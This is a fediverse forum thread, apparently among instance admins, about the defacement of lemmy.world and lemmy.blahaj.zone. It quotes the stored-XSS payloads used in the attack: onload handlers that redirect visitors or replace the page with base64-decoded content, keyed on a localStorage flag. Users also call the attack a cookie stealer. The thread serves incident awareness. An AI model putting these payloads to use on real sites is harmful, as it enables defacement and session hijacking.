Originally this post was me saying “oh, they refederated us.” They didn’t, they got hacked, lol. We’ve temporarily defederated with lemmy.world on our end (not that they federated with us anyway) until they get their shit back.
Went there hoping to see three grandpas getting busy, instead it’s some dude with a cigar… 🤨
EDIT: Looks like they got their page back.
They seem to have changed what happens a couple times.
I’ll refederate them once they make an announcement post or once their sidebar changes from this:
Thanks for this, they’ve been refederated on our end.
aaaand it’s compromised again. at least this time i was able to get the website’s payload before a redirect hit.
EDIT: sidebar has an onload component changing the window location if an item “h” can’t be found on the browser’s local storage:
onload="if(localStorage.getItem(`h`) != `true`){window.location.href = `https://lemmy.world/pictrs/image/7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}"
edit2: their backend is now down.
Alright, we’ll be defederating with them again. We’ll refederate once it’s clear they have things under control.
https://lemmy.ml/post/1896249 suggests this can be applied to all sidebars instead of just the main one. Can someone run a test on this?
Uh oh… They said it’s a cookie stealer and it even works on comments.
I suspect we aren’t high on the targets list. This looks like it’s coming from the edgy part of fedi and we have really relaxed rules here, and we aren’t talking about how “le nazis are at every corner and that it’s only a matter of time until they take over!!1111!!!” every 5s.
In any case, alt created so that I won’t risk my admin user’s session getting hijacked. Sanitize your strings, people.
lemmy.blahaj.zone has also been defaced. edit: it’s not the sidebar this time. the localstorage backdoor suggests it’s the same actor.
<div class="mt-4 p-0 fl-1"><div tabIndex="-1"><div class="home container-lg"><!--!--><div class="row"><main class="col-12 col-md-8 col-lg-9" role="main"><div id="tagline"><p><img class="icon icon-emoji" src="https://blahaj.zone/files/660c5387-e0f4-4dc3-aa31-2c7e90c86b20" title="ohno" alt="" onload="if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = atob(`PGlmcmFtZSB3aWR0aD0iNTYwIiBoZWlnaHQ9IjMxNSIgc3JjPSJodHRwczovL3d3dy55b3V0dWJlLmNvbS9lbWJlZC9aMUs0QlV0SHNPNCIgdGl0bGU9IllvdVR1YmUgdmlkZW8gcGxheWVyIiBmcmFtZWJvcmRlcj0iMCIgYWxsb3c9ImFjY2VsZXJvbWV0ZXI7IGF1dG9wbGF5OyBjbGlwYm9hcmQtd3JpdGU7IGVuY3J5cHRlZC1tZWRpYTsgZ3lyb3Njb3BlOyBwaWN0dXJlLWluLXBpY3R1cmU7IHdlYi1zaGFyZSIgYWxsb3dmdWxsc2NyZWVuPjwvaWZyYW1lPg==`)}""/></p>blob decodes to
'<iframe width="560" height="315" src="https://www.youtube.com/embed/Z1K4BUtHsO4" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>'All I have to say is
HAHAHAHAHAHAHAHAHAHAHAHA
Meanwhile on kbin:
Thanks for the heads up!
They make it abundantly clear tbf since it redirects you to lemonparty if you access any of their pages.
Not sure what mechanism does it, though. Since it lets me access a thread momentarily and then a few seconds later the redirect kicks on.
Anyways, mfw this happened to an instance that defederated us:
